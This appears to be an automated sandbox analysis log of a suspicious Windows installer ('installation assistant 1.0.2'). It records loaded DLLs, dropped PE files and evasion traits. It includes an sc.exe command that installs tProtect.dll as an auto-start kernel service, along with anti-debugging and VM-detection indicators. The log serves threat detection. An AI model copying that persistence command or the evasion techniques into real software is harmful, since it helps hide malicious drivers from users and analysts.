Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static file information: File size 5707508 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2189179691.0000000003720000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2188798294.0000000003520000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount | 10_2_00F157D0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: real checksum: 0x0 should be: 0x5810a0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.2.dr | Static PE information: section name: .00cfg
Source: update.vac.2.dr | Static PE information: section name: .voltbl
Source: update.vac.2.dr | Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: is-EIO1L.tmp.6.dr | Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC486EB push ecx; ret | 6_2_6CC486FE
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAF0F00 push ss; retn 0001h | 6_2_6CAF0F0A
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD16F10 push eax; ret | 6_2_6CD16F2E
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC7B9F4 push 004AC35Ch; ret | 6_2_6CC7BA0E
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD17290 push eax; ret | 6_2_6CD172BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E945F4 push 00F3C35Ch; ret | 10_2_00E9460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2FB10 push eax; ret | 10_2_00F2FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2FE90 push eax; ret | 10_2_00F2FEBE
Source: update.vac.2.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr | Static PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-EIO1L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information set: NOOPENFILEERRORBOX (97 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (10 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 6125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3578
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Window / User API: threadDelayed 610
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Window / User API: threadDelayed 667
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Window / User API: threadDelayed 582
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-EIO1L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- API coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080 -- Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed (32 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC3AEC0 FindFirstFileA,FindClose,FindClose, 6_2_6CC3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 10_2_00E96868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00E96868
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 10_2_00E97496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00E97496
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 10_2_00E99C60 GetSystemInfo, 10_2_00E99C60
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000002.2156449096.0000000000D88000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CAC3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6CAC3886
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Thread information set: HideFromDebugger (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC50181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CC50181 (2 identical entries)
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 10_2_00F157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00F157D0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC59D66 mov eax, dword ptr fs:[00000030h] 6_2_6CC59D66
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC59D35 mov eax, dword ptr fs:[00000030h] 6_2_6CC59D35
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC4F17D mov eax, dword ptr fs:[00000030h] 6_2_6CC4F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp -- Code function: 6_2_6CC48CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CC48CBD

HIPS / PFW / Operating System Protection Evasion

